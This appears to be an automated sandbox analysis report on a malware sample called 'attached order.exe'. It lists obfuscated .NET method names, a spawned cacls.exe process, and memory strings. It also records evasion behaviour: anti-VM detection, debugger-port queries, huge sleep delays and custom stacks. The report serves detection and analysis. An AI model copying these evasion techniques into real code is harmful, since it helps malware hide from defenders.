                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, QdlGFmrkGBZ5RgQMJfR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yD1fVnCA6l', 'DP0fNkEoC5', 'w7DfRBGDaS', 'JDtfkYnGmU', 'UuhfGW7Tyi', 'Nq1fC7nsM7', 'JXifm2WJph'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csHigh entropy of concatenated method names: 'TiPt8tBHwg', 'E53tsFWnDp', 'YTTtIo7c1r', 'EdntAPQxvJ', 'qybtcOwFm3', 'ALVtwjAT2r', 'JOItoUSNNU', 'AMVt544uEg', 'ed3tZZH0HO', 'tjVtgUqYix'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, TPN3d7UDbhgCkcLQUk.csHigh entropy of concatenated method names: 'bmJFBD6kfb', 'ms0F6I4Z78', 'SdJF2tcAe1', 'o9TFd4VS17', 'h7RFHLSb8E', 'pYvFPButgh', 'MB5Fp9V5Hc', 'm4qFj6aDgQ', 'dobFWE09k7', 'wRWFJvXUFj'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, iJdG0BmQPFSP0j3YBo.csHigh entropy of concatenated method names: 'Dispose', 'PuWMO0iSne', 'BkyY61qHms', 'qVqyxfFIiq', 'gM6Mr6rK2j', 'MP6MzIJR6E', 'ProcessDialogKey', 'jeeYKZ3MjL', 'RNSYMwJJsO', 'AITYYbiEuL'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, rYI1hawWmEIHpHHthE.csHigh entropy of concatenated method names: 'SXM7aBMCrs', 'Qew7Qlq9BQ', 'qYp7B9oeot', 'aW576nWYDA', 'KcR7dPoSI3', 'Asq7HFnwKj', 'PGS7pmRMIB', 'VZG7jdwxrx', 'WQw7JtQcOB', 'CLi7VPLoYV'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eVvt4kqypRIiTj4YV6.csHigh entropy of concatenated method names: 'wZTweCm5HJ', 'E4xwX5U1LS', 'I7RwTB2KQX', 'lN6wbGfoD5', 'corwvancqC', 'gAbwqPCUyv', 'Ja4wQOdPRZ', 'G52wLOsX9n', 'MO84JSrPj01cKQwhiYE', 'GPBaVXrlA0Ft4dXne6d'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, l79wYB7WMJ2cyYK3S5.csHigh entropy of concatenated method names: 'pvgoXenhU6', 'EqRo3wvQOS', 'GEwoTeN2m0', 'jDXob6ffWQ', 'Y4roifhMh8', 'zliov7a7DQ', 'AuWoqxpGNA', 'pcuoamH1jE', 'WHioQLb4Vx', 'em7oL3S8oh'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, nq4p8DrrfiFhR2PyIVo.csHigh entropy of concatenated method names: 'lmmfrHJB4q', 'xA1fze807A', 'zP5hKJJ8Hq', 'hOOhMQBVrF', 'UaKhYVAXsG', 't4Rht4bNg9', 'R74h0Ulalw', 'hnyh8cBmq7', 'HgmhsfVRNx', 'DhEhIohEMY'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, kiIMTrfFNeVMhL8TTa.csHigh entropy of concatenated method names: 'FPtciGKgY4', 'uwjcqjj1y7', 'BaTA28LlKI', 'SpLAd96T7O', 'MBQAHk2Z1P', 'YatAPovX6C', 'bbtApxfJ6d', 'eKsAjrM3fq', 'FlmAWUOTau', 'CVHAJj3tUq'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Yr9UhjPRPHk49KsZse.csHigh entropy of concatenated method names: 'WmNIkEJEn2', 'rIPIGNn2vC', 'gNdIC1OxfP', 'ISbImWnp4F', 'NTUIxlHtIy', 'UToIuqjmwI', 'IyGIneOPmS', 'CIIIUTcxLh', 'LLVIOv2qOb', 'aWyIrpQTNW'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, kLptsSr60HPKa7R7vbZ.csHigh entropy of concatenated method names: 'ToString', 'QSBhaY6R1N', 'QfFhQfRKDo', 'duPhLR7Q1O', 'MuWhBqrjib', 'xumh6Z4ZCF', 'cJuh2dQCcY', 'm8fhd62BeY', 'ptMkRoL6UDDMUYeAth5', 'LdDnDvLruvYPQAdqcLt'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, GnTBRbs4alXFnisyMh.csHigh entropy of concatenated method names: 'b98fAZsDLZ', 'Fb7fcrjjrB', 'hBNfwoJRlH', 'q0pfoqEqiV', 'CuifF7UwQB', 'W3Qf5DL71J', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, itYFVZIe9hkpVHMofY.csHigh entropy of concatenated method names: 'Seqw8KTyg9', 'wGJwIye311', 'ETswceKNwF', 'rdtwo0d3Mt', 'rPNw5unmDi', 'Xj6cxE2IPA', 'REYcuRiqgA', 'C6DcnFpO6e', 'H35cUZTehd', 'iZccOkPpke'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eRABhcrNQh1PLErMOYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8DyFu4HrR', 'YJGyflb2Vj', 'g58yhLRGwC', 'XCIyyEgJrc', 'nViySFbZ2e', 'dgCy9Z1mSt', 'hS4yeae9CO'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, cQmN4b32gbIKZ4x1dS.csHigh entropy of concatenated method names: 'DJHAbcyoR3', 'qRYAvhfbWe', 'wtIAaSorC8', 'AWUAQTwRIH', 'Fq7A1BNvno', 'r18ADf5rMo', 'NiXAl1qLuX', 'iQcAEwOW1T', 'Ho6AFo0NEW', 'bUXAfSBKsr'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, gfskp8Q84So3K9tiKr.csHigh entropy of concatenated method names: 'oqmoswUdaK', 'QQSoAAp7nb', 'UkFowfpaYN', 'DL2wrPbg8b', 'm4Bwzjr8rP', 'dPvoKf3vwN', 'iSjoMp8hbt', 'ji0oYRb74t', 'RslotkMfJk', 'NKMo0Iqhy3'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, s8HNx2AxO9TnfXUWQd.csHigh entropy of concatenated method names: 'Bc3wLwrUa4xrOqpUmEP', 'c3mOOMrhIJYLCoOtbx2', 'lLtpvir2H37k5SJmhXL', 'SGcwEkCHm9', 'QcHwFyAUpx', 'Tnrwf4dT1X', 'QllN7Tr0buwPgGdlIWP', 'BUhh12rIxlZnyXgHgu8'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, YmlVkdiyjWDJPWx8hw.csHigh entropy of concatenated method names: 'Kc5F1d6u2P', 'gfhFlXZYTw', 'bKmFFuT2Mi', 'mB7FhQJYSf', 'uVaFSEKtWm', 'mGrFegvV9T', 'Dispose', 'qkhEsNgaN7', 'ctBEIptCKQ', 'n2kEAYIIdj'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eTLVDTKsInEqj6ZJVp.csHigh entropy of concatenated method names: 'QgDlgjp2yu', 'HJ2l4n9COW', 'ToString', 'ErplsveGcJ', 'hS1lIN7DEg', 'rhulAYiITn', 'nJClc4KFxZ', 'FdIlwnlkcf', 'oURlobXjfr', 'ajnl5AlO1T'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, n33M3uz3ORD1UdBYlt.csHigh entropy of concatenated method names: 'yhXfvgH9Ws', 'NiefaHeHlH', 'ggHfQ9EU1s', 'ewcfBqZ045', 'pOof60l7ES', 'xJQfdnZR1D', 'hXxfHaBvhZ', 'n02fe3hIU8', 'n3hfXZhrfp', 'intf3Wmljq'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, EgP0XVNcRfQGNejquO.csHigh entropy of concatenated method names: 'aMLMoyQ3Ek', 'LyMM5lVUe8', 'boaMgVua79', 'fotM47u3Ye', 'z3cM1f0Zcy', 'qT3MDucRFr', 'ARTbvkMc6KNFI5I7C4', 'K1D1tUKcpeii4Q7rx4', 'BscMMcKMgP', 'DIdMtlxfsY'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, WcniDe88ARxPuNbytN.csHigh entropy of concatenated method names: 'ToString', 'mH4DVBYc97', 'J67D6XaQra', 'aweD2W48ye', 'zFrDd23Bud', 'RFcDHlML0s', 'IYcDPbicSt', 'aoLDpoTdw7', 'FxXDjjQtsc', 'FoSDW1Qnr6'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Rpq2Lh6LQL1dHucNxX.csHigh entropy of concatenated method names: 'm7TTiK7tM', 'VHibv4SUk', 'HE5vp148q', 'YVVqfcUKn', 'IYRQ4VAXm', 'LaQL1bfvw', 'p3u9o4ogGhsFFWSnpA', 'CBcLcrX1At8i9Ajp8V', 'FLDEJhytJ', 'pMDfhOsim'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, QdlGFmrkGBZ5RgQMJfR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yD1fVnCA6l', 'DP0fNkEoC5', 'w7DfRBGDaS', 'JDtfkYnGmU', 'UuhfGW7Tyi', 'Nq1fC7nsM7', 'JXifm2WJph'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csHigh entropy of concatenated method names: 'TiPt8tBHwg', 'E53tsFWnDp', 'YTTtIo7c1r', 'EdntAPQxvJ', 'qybtcOwFm3', 'ALVtwjAT2r', 'JOItoUSNNU', 'AMVt544uEg', 'ed3tZZH0HO', 'tjVtgUqYix'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, TPN3d7UDbhgCkcLQUk.csHigh entropy of concatenated method names: 'bmJFBD6kfb', 'ms0F6I4Z78', 'SdJF2tcAe1', 'o9TFd4VS17', 'h7RFHLSb8E', 'pYvFPButgh', 'MB5Fp9V5Hc', 'm4qFj6aDgQ', 'dobFWE09k7', 'wRWFJvXUFj'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, iJdG0BmQPFSP0j3YBo.csHigh entropy of concatenated method names: 'Dispose', 'PuWMO0iSne', 'BkyY61qHms', 'qVqyxfFIiq', 'gM6Mr6rK2j', 'MP6MzIJR6E', 'ProcessDialogKey', 'jeeYKZ3MjL', 'RNSYMwJJsO', 'AITYYbiEuL'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, rYI1hawWmEIHpHHthE.csHigh entropy of concatenated method names: 'SXM7aBMCrs', 'Qew7Qlq9BQ', 'qYp7B9oeot', 'aW576nWYDA', 'KcR7dPoSI3', 'Asq7HFnwKj', 'PGS7pmRMIB', 'VZG7jdwxrx', 'WQw7JtQcOB', 'CLi7VPLoYV'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eVvt4kqypRIiTj4YV6.csHigh entropy of concatenated method names: 'wZTweCm5HJ', 'E4xwX5U1LS', 'I7RwTB2KQX', 'lN6wbGfoD5', 'corwvancqC', 'gAbwqPCUyv', 'Ja4wQOdPRZ', 'G52wLOsX9n', 'MO84JSrPj01cKQwhiYE', 'GPBaVXrlA0Ft4dXne6d'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: attached order.exe PID: 7972, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0CD144
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0D0594
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0CFF74
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0CD6C4
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0CD864
                      Source: C:\Users\user\Desktop\attached order.exeAPI/Special instruction interceptor: Address: 7FF82C0CD004
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD144
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0D0594
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD764
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD324
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD364
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD004
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CFF74
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD6C4
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD864
                      Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF82C0CD604
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 1AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 33D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 53D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 5B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 6B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 6CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: 7CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: BA80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: CA80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: CF10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: DF10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177088E rdtsc 3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 9852Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeAPI coverage: 0.9 %
                      Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.3 %
                      Source: C:\Users\user\Desktop\attached order.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264Thread sleep count: 121 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264Thread sleep time: -242000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264Thread sleep count: 9852 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264Thread sleep time: -19704000s >= -30000sJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0067C940 FindFirstFileW,FindNextFileW,FindClose,5_2_0067C940
                      Source: C:\Users\user\Desktop\attached order.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YwQDqEmu
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YwQDqEmurjFGBKNvIy0||0||0||0||0||||||0||0||0||0||||||||||||||0||0||0||0||0||0||0||0||4.0||2||15769||0||0||||||0||0||1||2||0||x86||0||.exe||
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000036F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YwQDqEmu
                      Source: RAVCpl64.exe, 00000004.00000002.17793357881.000000000053A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_`
                      Source: cacls.exe, 00000005.00000002.17793373650.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.17170759915.00000151460A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\attached order.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177088E rdtsc 3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_00417E43 LdrLoadDll,3_2_00417E43
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736179 mov eax, dword ptr fs:[00000030h]3_2_01736179
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176415F mov eax, dword ptr fs:[00000030h]3_2_0176415F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A147 mov eax, dword ptr fs:[00000030h]3_2_0172A147
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A147 mov eax, dword ptr fs:[00000030h]3_2_0172A147
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A147 mov eax, dword ptr fs:[00000030h]3_2_0172A147
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BA130 mov eax, dword ptr fs:[00000030h]3_2_017BA130
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760118 mov eax, dword ptr fs:[00000030h]3_2_01760118
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017401F1 mov eax, dword ptr fs:[00000030h]3_2_017401F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017401F1 mov eax, dword ptr fs:[00000030h]3_2_017401F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017401F1 mov eax, dword ptr fs:[00000030h]3_2_017401F1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h]3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h]3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h]3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h]3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h]3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F81EE mov eax, dword ptr fs:[00000030h]3_2_017F81EE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F81EE mov eax, dword ptr fs:[00000030h]3_2_017F81EE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017281EB mov eax, dword ptr fs:[00000030h]3_2_017281EB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017401C0 mov eax, dword ptr fs:[00000030h]3_2_017401C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017401C0 mov eax, dword ptr fs:[00000030h]3_2_017401C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov ecx, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov eax, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov eax, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E1A4 mov eax, dword ptr fs:[00000030h]3_2_0176E1A4
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E1A4 mov eax, dword ptr fs:[00000030h]3_2_0176E1A4
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736074 mov eax, dword ptr fs:[00000030h]3_2_01736074
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736074 mov eax, dword ptr fs:[00000030h]3_2_01736074
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760044 mov eax, dword ptr fs:[00000030h]3_2_01760044
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B6040 mov eax, dword ptr fs:[00000030h]3_2_017B6040
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772010 mov ecx, dword ptr fs:[00000030h]3_2_01772010
